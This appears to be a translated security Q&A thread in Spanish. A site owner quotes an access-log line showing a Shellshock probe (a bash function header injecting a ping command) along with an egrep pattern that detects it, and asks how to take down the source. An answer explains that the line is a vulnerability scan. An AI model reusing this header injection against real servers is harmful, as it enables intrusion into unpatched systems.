¿Puede alguien cerrar el "198.101.206.138" y el "89.207.135.125" hacia abajo? [cerrado]

Navega tus respuestas
-7
egrep "};|}\s*;" /var/www/logs/access* 
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

¿Cómo podemos cerrar el servidor detrás de la IP que hizo esto?

    
pregunta somelooser28533 26.09.2014 - 12:18
fuente

1 respuesta

4

La entrada de registro que estás mostrando no es un ataque. Es simplemente una prueba para ver si eres vulnerable: /bin/ping -c 1 198.101.206.138 significa "enviar un solo paquete de eco ICMP al 198.101.206.138". Además, solo funciona en sistemas que almacenan scripts CGI en el directorio /cgi-sys/ no estándar, en lugar del habitual /cgi-bin/ .

    
respondido por el Mark 26.09.2014 - 12:27
fuente

Lea otras preguntas en las etiquetas

El algoritmo se mantuvo en secreto, mientras que la salida no está [cerrada] ¿Cuál es el mejor sistema operativo para un probador de penetración en 2016 y por qué es el mejor? [cerrado]